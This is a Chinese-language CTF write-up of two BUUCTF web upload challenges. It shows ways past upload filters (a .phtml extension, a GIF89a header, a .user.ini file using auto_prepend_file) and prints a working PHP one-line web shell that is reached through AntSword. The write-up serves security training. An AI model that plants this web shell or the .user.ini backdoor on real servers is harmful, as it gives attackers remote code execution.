BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn

文章目录

  • 一、[极客大挑战 2019]Upload
    • Ⅰ、.phtml
    • Ⅱ、解题
  • 二、[SUCTF 2019]CheckIn
    • Ⅰ、exif_imagetype()绕过
    • Ⅱ、.user.ini
    • Ⅲ、解题

一、[极客大挑战 2019]Upload

Ⅰ、.phtml

.phtml是PHP2程序的标准文件扩展名,当PHP4更新后,统一为.php

Ⅱ、解题

开启环境
BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn_第1张图片
尝试上传一句话木马,发现网站会检查文件类型
BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn_第2张图片
使用Burp抓包,将上传的一句话木马修改后缀,并修改文件类型为image/jpeg

BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn_第3张图片
报错,提示禁止上传内容包含的文件,因此不能使用.php

BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn_第4张图片
这里使用旧版本PHP的文件,即.phtml,将一句话木马包进去,另外加上GIF的文件头绕过图片判断

GIF89a
<script language="PHP">@eval($_POST["a"]);</script>

BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn_第5张图片
成功上传

BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn_第6张图片
尝试多次,猜测上传路径为/upload/xxx.phtml,使用蚁剑连接

BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn_第7张图片
根目录找到flag目录,打开即可得到FLAG

BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn_第8张图片
BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn_第9张图片

二、[SUCTF 2019]CheckIn

Ⅰ、exif_imagetype()绕过

给文件首行添加图片文件头即可绕过,常见的是添加GIF文件头GIF89a

Ⅱ、.user.ini

此文件控制着用户设置
若服务器为PHP、且上传的目录内含有php文件可以使用,通过添加语句auto_prepend_file=xxx,指定预解析文件,则可以在加载主页前预解析一句话木马,即可开启后门

Ⅲ、解题

上传一句话木马和设置文件,需要添加GIF文件头绕过检测

其中,一句话木马后缀为jpg

#a.phtml.jpg
GIF89a
<script language="PHP">@eval($_POST["a"]);</script>
#.user.ini
GIF89a
auto_prepend_file=a.phtml.jpg

使用蚁剑连接访问index.php即可得到根目录进而拿到FLAG

BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn_第10张图片
BUUCTF_Web——[极客大挑战 2019]Upload、[SUCTF 2019]CheckIn_第11张图片

欢迎在评论区留言
感谢浏览

你可能感兴趣的:(#,Web,php,安全,ctf,web,BUUCTF)